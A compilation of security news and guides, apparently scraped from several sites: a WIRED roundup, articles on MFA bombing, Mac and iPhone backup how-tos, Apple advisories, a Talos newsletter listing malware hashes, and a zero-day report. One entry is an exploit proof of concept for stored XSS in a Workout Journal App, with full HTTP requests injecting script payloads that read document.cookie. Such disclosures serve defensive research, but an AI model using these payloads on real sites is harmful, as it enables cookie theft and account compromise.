Plus: “MFA bombing” attacks target Apple users, Israel deploys face recognition tech on Gazans, AI gets trained to spot tent encampments, and OSINT investigators find fugitive Amond Bundy.

The saga of WikiLeaks founder Julian Assange continued this week after the UK’s high court ordered a delay in his extradition to the United States. Assange faces 18 charges in the US, including 17 alleged violations of the Espionage Act—charges that have alarmed journalism watchdogs. The two judges who issued the ruling said in a summary of their decision that the US must offer further assurances that Assange’s First Amendment rights will be respected and that he will not face the death penalty if convicted.

The University of Cambridge’s medical school is still recovering from “malicious activity” which the school first detected last month. The incident impacted IT services provided by Cambridge’s Clinical School Computing Service, and several websites were knocked offline. While the university also recently suffered a distributed denial-of-service attack, allegedly carried out by the hacker group Anonymous Sudan, it’s unclear if the two incidents are related, and the university has not yet clarified the nature of the “malicious activity.”

US and UK authorities this week announced sanctions and charges against members of APT31, a Chinese state-sponsored hacker group. Also known as Violet Typhoon or Judgement Panda, APT31 hackers have for the past 14 years targeted critics and political enemies around the world to conduct espionage campaigns, according to the US Department of Justice.

Finally, WIRED discovered a trove of information left online by a location data broker that reveals sensitive details about the visitors to Jeffrey Epstein’s notorious “pedophile island.” The data includes more than 11,000 precise coordinates, as many as 166 of which pinpoint the likely homes and workplaces of visitors who live in the continental United States.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

A few rules of thumb can vastly increase your online safety: Don’t click on links or open attachments from strangers. Double-check the sender of emails and other messages to ensure they’re not surreptitious phishing attempts. And be sure a shipping company really is who it claims to be rather than a cybercriminal gang plotting to hijack a truckload of your yogurt and hold it for ransom.

The last of those lessons was highlighted by _The Wall Street Journal_ this week in a story about a troubling form of online fraud: Fraudsters are insinuating themselves into so-called load boards, the online platforms that manufacturers, shipping companies, and the brokers who work with them use to make deals for transporting goods via truck to retailers or other destinations. By spoofing the identity of a carrier—the companies that employ truck drivers to pick up goods—fraudsters can trick brokers who arrange those deals into handing over large amounts of cargo. The criminals can then either complete the deal with a legit carrier at a lower price and pocket the difference, or simply steal the cargo.

In the case of one $50,000 load of Danone yogurt and plant-based milk, the thieves opted for the latter. The broker who had arranged the deal discovered that the fraudsters had spoofed the motor carrier number, a unique identifier, for the broker’s intended trucking company. Then they rerouted their yogurt booty from its intended destination in Florida to a warehouse in Pennsylvania. The brokerage describes receiving emails and even a phone call from an Armenian number demanding a $40,000 ransom. (The brokers refused to pay and collected an insurance payout instead. What happened with the yogurt—and exactly how much yogurt a single gang of Armenian cybercriminals can feasibly consume before it spoils—remains unclear.)

The Journal’s story reveals that cargo hijacking fraud remains a serious problem—one that cost $500 million in 2023, quadruple the year before. Victims say load board operators need to do more to verify users’ identities, and that law enforcement and regulators also need to do more to address the thefts.

**Apple Users Targeted With “MFA Bombing” Hacking Tactic**

Multifactor authentication (MFA) has served as a crucial safeguard against hackers for years. In Apple’s case, it can require a user to tap or click “allow” on an iPhone or Apple Watch before their password can be changed, an important protection against fraudulent password resets. But KrebsOnSecurity reports this week that some hackers are weaponizing those MFA push alerts, bombarding users with hundreds of requests to force them to allow a password reset—or at the very least, deal with a very annoying disruption of their device. Even when a user does reject all those password reset alerts, the hackers have, in some cases, called up the user and pretended to be a support person—using identifying information from online databases to fake their legitimacy—to social engineer them into resetting their password. The solution to the problem appears to be “rate-limiting,” a standard security feature that limits the number of times someone can try a password or attempt a sensitive settings change in a certain time period. In fact, the hackers may be exploiting a bug in Apple’s rate limiting to allow their rapid-fire attempts, though the company didn’t respond to Krebs’ request for comment.

**Israel Deploys Controversial Facial Recognition Tech in Its Surveillance of Gazans**

Israel has long been accused of using Palestinians as subjects of experimental surveillance and security technologies that it then exports to the world. In the case of the country’s months-long response to Hamas’ October 7 massacre—a response that has killed 31,000 Palestinian civilians and displaced millions more from their homes—that surveillance now includes using controversial and arguably unreliable facial recognition tools among the Palestinian population. _The New York Times_ reports that Israel’s military intelligence has adopted a facial recognition tool built by a private tech firm called Corsight, and has used it in its attempts to identify members of Hamas—particularly those involved in the October 7 attack—despite concerns that the tech was sometimes faulty and produced false positives. In one case, for instance, the Palestinian poet Mosab Abu Toha was pulled out of a crowd by soldiers who had somehow identified him by name, before he was beat, accused of being a member of Hamas, and interrogated, before soldiers then told him the interrogation had been a “mistake.”

**AI Cameras Trained to Spot Encampments of Unhoused People**

In other dystopian AI news, _The Guardian_ this week reported on a government project in San Jose, California, that used AI-enabled computer vision technology to identify encampments and vehicles lived in by unhoused people. In the project, video recorded from a car around the city is given to participating companies including Ash Sensors, Sensen.AI, Xloop Digital, Blue Dome Technologies, and CityRover, which use it as training data to develop a system that can recognize tents or vehicles that people might be living in. While the project has been described as a way to identify and help people in need, advocates for the unhoused in San Jose say they’re concerned the data is likely to instead be given to the police, and thus as just another form of surveillance targeting the most vulnerable inhabitants of the city.

**Bellingcat Investigators Find Far-Right Fugitive Ammon Bundy**

Radical libertarian Ammon Bundy, a well-known figure on the far right, has been on the run since last year, charged with contempt of court after being ordered to pay $50 million to an Idaho hospital he’d accused of child trafficking and leading a campaign of harassment that targeted its staff. Then last month, he posted a provocative video to YouTube titled, “Want to Know Where Ammon Bundy Is?” The open source detectives at Bellingcat apparently did: They found enough evidence in Bundy’s videos to convincingly reveal his location. Bellingcat was able to use material like a school calendar in the background of one shot, a mountain range in another, and a highway sign in a third to place Bundy in a certain county in southern Utah. When contacted by Bellingcat, Bundy denied hiding and wrote, a little confusingly, that “at any time peace officers could find me if they wish.”

Yogurt Heist Reveals a Rampant Form of Online Fraud

Malicious ads and bogus websites are acting as a conduit to deliver two different stealer malware, including Atomic Stealer, targeting Apple macOS users.
The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims' Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.
One

Hackers Target macOS Users with Malicious Ads Spreading Stealer Malware

Cybercriminals have taken MFA bombing to the next level by calling victims of an attack from a spoofed Apple Support number.

Simply put, MFA bombing (also known as “push bombing” or “MFA fatigue”) is a brute force attack on your patience. Cybercriminals use MFA bombing to break into accounts that are protected by multi-factor authentication (MFA).

MFA normally requires a user to enter a six-digit code sent by SMS, or generated by an app, or to respond to a push notification, when they enter a username and password. It provides an enormous increase in security and makes life much harder for criminals.

Because it’s so hard to break, criminals have taken to getting users to defeat their own MFA. They do this by using stolen credentials to try logging in, or by trying to reset a user’s password over and over again. In both cases this bombards the user with push notifications asking them to approve the login, or messages asking them to change their password. By doing this, the criminals hope that users will either tap the wrong option or get so fed up they just do whatever the messages are asking them to do, just to make the bombardment stop.

Now, according to this blog by Bran Krebs, these attacks have evolved. If you can withstand the pressure of the constant notifications, the criminals will call you pretending to come to your rescue.

In one example Krebs writes about, criminals flooded a target’s phone with password reset notifications for their Apple ID. Each notification required the user to choose either “Allow” or “Don’t Allow” before they could go back to using their device.

After withstanding the temptation to click “Allow”, and declining “100-plus” notifications, the victim receved a call from a spoofed number pretending to be Apple Support.

The call was designed to get the victim to trigger a password reset, and then to hand over the one-time password reset code sent to their device. Armed with a reset code, the criminals could change the victim’s password and lock them out of their account.

Luckily, in this situation the victim thought the callers seemed untrustworthy, so he asked them to provide some of his personal information, and they got his name wrong.

Another victim of MFA bombing learned that the notifications kept coming even after he bought a new device and created a new Apple iCloud account. This revealed that the attacks must have been targeted at his telephone number, because it was the only constant factor between the two device configurations.

Yet another target was told by Apple that setting up an Apple Recovery Key for his account would stop the notifications once and for all, although both Krebs and the victim dispute this.

Unfortunately, there doesn’t seem to be a lot you can do once an MFA bombing attack starts other than be patient, and be careful not to click Allow. If you get a call, know that Apple Support will never call you out of the blue, so don’t trust the caller, no matter how convenient their timing.

If you lose control of your Apple ID, go to iforgot.apple.com to start the account recovery process.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 MFA bombing taken to the next level 

Backing up your Mac is a simple process that can save your most important files from cyberthreats.

Backing up your Mac computer doesn’t need to be intimidating.

By taking advantage of a user-friendly feature released by Apple several years ago, the entire backup process can be handled almost automatically, preserving your most important files, photos, applications, and emails from cyberthreats and mishaps.

Before starting the backup process, **you will** **need an external storage device** that can connect to your Mac with a USB or Thunderbolt cable. External storage devices, which are sometimes called external hard drives, are developed and sold by many different companies, including Lacie, SanDisk, and Western Digital.

If you do not have an external storage device, you must first get one. You should also follow Apple’s recommendation that your external storage device be **twice as large** as the hard drive of your Mac computer.

To find the hard drive size of your current Mac, open the **System Settings** app on your computer. On the left-hand rail, click **General** and then, in the window open to the right, click **Storage**.

Several statistics and options will be shown.

At the top of the Storage section, the hard drive space is shown. Here, it is 494.38 GB, or 500 GB roughly.

The Mac shown here has 500 GB of internal storage. If we were to back this Mac up, we would need to use an external storage device of 1 TB (terabyte).

Once you have your external storage device, you can begin the actual backup processs.

The simplest way to back up your Mac is with the built-in feature “**Time Machine**.”

First, connect your external storage device to your Mac.

Then, you need to set up that storage device as your “backup disk.” This means that, from this point forward, your external storage device will have one primary use, and that is as a backup device that syncs with Time Machine. Apple recommends that you **do** **not** use your external storage device that you are using with Time Machine for anything other than Time Machine backups.

To set up your storage device as your backup disk, follow these instructions:

Go to **System Settings**.  

Click on **General** in the left sidebar.

From here, click on **Time Machine** in the main window displayed to the right.

From the **Time Machine** menu, click **Add Backup Disk** or click the “Add” button (+).

From here, select your external storage device and then click **Set Up Disk**.

At this point in the process, you may receive two options from Time Machine:

1.  If your device has other files on it, you will be asked if you want to erase the device so that it can be used solely as a backup with Time Machine. You can erase the files immediately and then continue the backup process through Time Machine. If you do not want to erase the files, you need to get a separate external storage device that will be used exclusively as a backup with Time Machine.
2.  If your external storage device already has backups from a prior computer, you will be asked whether you can to keep those backups and roll them into new backups made with Time Machine. This is up to you.

From here, the backup process is nearly done.

To make a backup, simply click on **Back Up Now** from the Time Machine menu.

Your first backup could take a long time to complete, but know that you can continue using your computer like normal while the process happens in the background.

From here on, whenever you attach your external storage device to your Mac, Time Machine will automatically ask to make a backup of the changes to your Mac. You can also change the frequency of your backups in your Time Machine Settings.

 How to back up your Mac 

An easy-to-understand guide on how to backup your iPhone or iPad to iCloud automatically.

They say the only backup you ever regret is the one you didn’t make. iPhone backups can be used to easily move your apps and data to a new phone, to recover things you’ve lost, or to fix things that have failed.

The most convenient way to backup your iPhone is to have it backup to iCloud. Backups are made every day, automatically, provided your phone is connected to power and locked. Be aware though that backups take take up a lot of your iCloud storage, and your phones’ data plan if you choose to backup when you aren’t connected to Wi-Fi. If those are likely to be problems for you, you might prefer to backup your iPhone to your Mac.

This guide tells you how to enable backups to iCloud, and how to check that everything is working as you expect.

Open the **Settings** app.

Then tap where you see your name and **Apple ID, iCloud+, Media & Purchases**.

Next, tap **iCloud**.

Scroll down and tap **iCloud Backup**.

Toggle **Back Up This iPhone** to on.

This may reveal a **Back Up Over Cellular Data** or **Back Up Over Mobile Data** toggle. This creates backups when you aren’t connected to Wi-Fi. Because backups can use a lot of data, toggling this on may cause you to exceed your data plan.

Once you have made a backup, you can access it from this screen under **ALL DEVICE BACKUPS**.

You can return to the previous screen by tapping the **< iCloud** link at the top. This screen shows you how much storage space your backups are using. To see a little more detail, tap **Manage Account Storage**.

Scroll down the list of apps until you see **Backups** to see how much storage your backups are using.

**We don’t just report on phone security—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

 How to back up your iPhone to iCloud 

Apple Security Advisory 03-25-2024-1 - Safari 17.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-1 Safari 17.4.1

Safari 17.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214094.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

WebRTC  
Available for: macOS Monterey and macOS Ventura  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

Safari 17.4.1 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPKcACgkQX+5d1TXa  
IvpFfBAAvnUeX8jpQu9uS+hiv0FKFu/YUSafIVOutV2ls8jQbdd3HVKwIRNmTZ4g  
0u7drE/D9mTBMzfmvdyNKk4lrnsvgJYNgurGPudpqDr7LmzkDdn0DOWL5xxSs7Jx  
ekUxjtHiPtEPMs41gs9ZZMHiMhU/r6G9LaTa2WrRcrBeqkLnepmee9RfrSbXDV5q  
NMGio6W95JWgRLM0+c06Jk/A6VhnrxwqFug9NMDXr/EgxxMjG5mxZKY7qXXUcWe+  
D2CI/1SRI0ucAkIKN5IDFY5X4Y/XWvp8YeVqdtQQ6RmfJDEE9zPRFSlr/PKRFnba  
LfEPFzWCDMZ6qqP9eSph7+8wFLngWwksf0O9xBq6KF+LUqIVb9RkJ1VZnYZluTt4  
tT161H0aTHOq9LhcFbAA5kQbdpfX7aulYq1xkaGz1a2KJxYFmr1p26Q7HMWHw5Zz  
BlnRH4xsQkoKaU96WSylDUdO5DYiQ27cRQddvqP40xIOTaK/SBTUlEYDCviU+8Xs  
1KhLmuSgfnra+akn0vCmy5tu/+DzlmUT4kvJsvcOApDyKtoeSzPUYucw65RrcEo3  
Aa/3eT3R8o9S8mdq6c3OIEF16/2IyxT9fJJE0YeQTli8zmkTu0Pw0RG2DzQhnfI6  
lDKmfx3c1PyCOU3By0XIfqsI9t3oWXcvbAgSgnDC6lmnZ7X2KpY=  
=JCdc  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-1

Apple Security Advisory 03-25-2024-2 - macOS Sonoma 14.4.1 addresses code execution and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-25-2024-2 macOS Sonoma 14.4.1

macOS Sonoma 14.4.1 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214096.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

CoreMedia  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

WebRTC  
Available for: macOS Sonoma  
Impact: Processing an image may lead to arbitrary code execution  
Description: An out-of-bounds write issue was addressed with improved  
input validation.  
CVE-2024-1580: Nick Galloway of Google Project Zero

macOS Sonoma 14.4.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmYCPIQACgkQX+5d1TXa  
IvrgbRAAg4RSaUphmr+xku+UTKjqN9BQU8fRYd+5UsN1x2DGTznnh1CIJrLi9XdM  
SkvIz076B9mtB0wlL6E7YCW4on5GXnvRt8OclNBjstjaxUZoqqeT0fs7KrKCm1WV  
fX7qcbIXo73cwzA7j/VoOtDCQr0aXAjBJv4zoIOERwAXw/BwJa8i9VZCeQT3RJr7  
Ww1EhYxfT1/XJhVk2rlTXLOBdL4FetbMNfENt8SozkUBTtOmU3BZeRDZ08RWpTn8  
nh+PKzrwmo+ayY8UcPZPcnrhw1fP8div1CIJc2v1AGnwr1rAzEbucJS4oQheT8SR  
8RhIYUCllkWkHzNTvAOJFc1K4clLPcAu1SG1+K7QPcpXJbMsKAybUGl+GOGbqvO8  
Dm3RHGU8BFgWKTAqDwUGzOs0GdaS/fmpRms+S22HlHx0/Z9kFA3lXEqAiVcxpVq8  
6RPJQiYsp7UBRFlCMx0X5bwCCLSaPPaGgJbWTcx3EaVlOXvUGyHaLcwmZUzicGCu  
GP5GHBjHgINslfm/lYLbUX2BPtT+Sed9VYojNs1ehGSLazpwgFVElpSou0OytxaK  
7mxU+ABDC3L7vn8QBX8ofF1EH/g57CMTKQlJDdVmsDaBmtY/LkOeSay5Zmr3qHDf  
RUFjjsxZltBKwnCQJBbViMbqJKwSdsuhHPSmVxBV0HGY9xiWUqc=  
=W3BD  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-25-2024-2

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day...

Thursday, March 28, 2024 10:00

Welcome to this week’s threat source newsletter with Jon out, you’ve got me as your substitute teacher. 

I’m taking you back to those halcyon days of youth and that moment when you found out that you had a sub that day, will I be the teacher that just rolls in the TV cart and delivers the single greatest blast of freedom that you can have in a classroom, or will I be the teacher that strolls into your 4th grade class and is appalled that you aren’t already conversant in Dostoevsky? Neither. Today I will be the old wizened oracle offering advice and attempting to answer one of the most asked questions I receive at public speaking engagements. So pull up a desk and don’t make that high pitched sound with a wet finger on the basket underneath the seat, because I know the old magicks.  

The number one question that I field after public speaking is “Why did they let you out of your cage to talk to normal people?” and honestly, I don’t really have an answer I just hope that no one notices. The next question is invariably a variation of “How did you become a threat hunter?”, “How do I get a job in cyber security?”, “How do I get a gig within Talos?” The answer is simply – be curious. Intellectual curiosity is the key. I’ll take it a step further when talking specifically about Talos and quote Walt Whitman (via Ted Lasso) and say, “Be curious, not judgmental” because being a positive part of the culture is as important as the deep arcane knowledge and skills that you need to get your foot in the door at Talos.  

There are a lot of paths that you can take in security and the various skill sets along each path vary but curiosity will carry you through each one. A lot of people will tell you to follow your passion and I will vehemently disagree; I will say to follow your aptitude. As you learn and grow within the field, you’ll find that some things come easily, don’t fight the wind in that scenario be the willow. If you are extremely early in your journey, find the helpers. There are tons of super helpful people, sites, and resources available to get you started and finding them is easy if you are curious. Attend a BSides or local security group like AHA. Install Snort and start learning what traffic looks like on the wire and create custom signatures. Install Kali and break things, in your own environment please. Combine the two and see where it will take you. If you are further along in your journey and are interested in taking the next step from analyst to malware research or reverse engineering, you can start with hasherezade's 1001 nights and see if you have the aptitude to follow that path. Don’t be afraid to try something and fail. Don’t expect to be good from the start. Don’t be afraid to ask questions and admit that you don’t know something – the most important things I’ve picked up usually come from “I don’t know, could you teach me?”.  

In the end there are truly almost as many paths as there are people doing the jobs. It’s crazy how varied the backgrounds on our teams are but curiosity is rampant.  

**The one big thing **

The one big thing is that clearly, I’m substituting, and all is normal in the security world. Vulns continue to be exploited, security vendors continue to be consolidated, and everything is as it was in the world. THISISFINEDOTGIF.  

**Why do I care? **

Because it’s what keeps us up at night. That and a warm cup of Liber-Tea.  

**So now what? **

Now we deliver Managed Democracy on Hell Divers 2 – together.  

**Top security headlines of the week **

A newly discovered vulnerability baked into Apple’s M-series of chips allows attackers to extract secret keys from Macs when they perform widely used cryptographic operations, academic researchers have revealed in a paper published Thursday. (Ars Technica, Wired    

Metasploit has announced the release of Metasploit Framework 6.4 which features several improvements and a new feature for Windows Meterpreter that allows for searching a process's memory for user-specified needles with support for regular expressions. (Rapid 7) 

**Can’t get enough Talos? **

*   Cisco Closes $28B Splunk Deal: 5 Big AI, Security And Partner Things To Know 
*   Beers With Talos: The old people episode 
*   Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
**MD5:** ff1b6bb151cf9f671c929a4cbdb64d86   
**Typical Filename:** endpoint.query   
**Claimed Product:** Endpoint-Collector   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f    
**Typical Filename:** VID001.exe    
**Claimed Product:** N/A    
**Detection Name:** Win.Worm.Coinminer::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** e38c53aedf49017c47725e4912fc7560e1c8ece2633c05057b22fd4a8ed28eb3   
**MD5:** c16df0bfc6fda86dbfa8948a566d32c1   
**Typical Filename:** CEPlus.docm   
**Claimed Product:** N/A    
**Detection Name:** Doc.Downloader.Pwshell::mash.sr.sbx.vioc

Enter the substitute teacher

By Waqas
Google’s Threat Analysis Group (TAG) reports a concerning rise in zero-day exploits and increased activity from state-backed hackers.…
This is a post from HackRead.com Read the original post: Google TAG Reports Zero-Day Surge and Rise of State Hacker Threats

Google’s Threat Analysis Group (TAG) reports a concerning rise in zero-day exploits and increased activity from state-backed hackers. This highlights the growing cybersecurity threats to businesses and individuals.

In an overview of cybersecurity threats, Google’s Threat Analysis Group (TAG) and **Google-owned Mandiant** disclosed 97 zero-day vulnerabilities exploited in the wild last year. That’s a score well above and significantly more than 50% of the 62 seen the year before but still comes in below the record 106 exploits in 2021.

It also indicated that among the 30 reported critical vulnerabilities, 29 were made by TAG and Mandiant, showing how much of a risk there is from threats that are not yet fixed. As per Google’s **blog post**, in its report, Google’s TAG researchers divided vulnerabilities into two categories: one targeting end user-based platforms and products, including iOS and Android devices and browsers, while the other targeted those technologies focused on enterprise-level solutions, such as security software.

One of the key trends pointed out in the report is the continued determination of the **threat from state-sponsored actors**, more so from the People’s Republic of China (PRC). A notable portion of the exploits were attributed to 12 zero-day vulnerabilities linked to the PRC by cyber-espionage groups, compared with seven the previous year.

The **report** emphasizes the changing tactics by threat actors, with an increase in targeting levels for technologies specific to the enterprise. According to Google, the trend of cyberattacks against corporate infrastructure continues to rise after the company recorded a 64% surge in the exploitation of technologies specific to the enterprise over the past year.

Most interestingly, these results also point to a shift in focus toward the exploitation of vulnerabilities in third-party components or libraries, which enlarge the overall attack surface for threat actors.

Among the positives, the report points out: that there are big investments from major platform vendors like **Apple**, **Google**, and **Microsoft** to make the security apparatus even better. The investment has also paid off, with few vulnerabilities observed in first-party code and mitigations improving against the worst attacks.

Finally, the report provides practical recommendations for how both individuals and businesses can improve their security situation. Other key recommendations brought out in the report are the adoption of transparency with timely disclosure, prioritizing threat mitigation strategies, and the solid building of security foundations.

> _“Evolving cyber threats will be responded to through enhanced collaboration and vigilance to protect the digital ecosystem. Google works on ongoing research with its expertise in the ever-growing need for collective resilience to threats.”_
> 
> Google

There’s much more in the **report** (PDF) the company published earlier today.

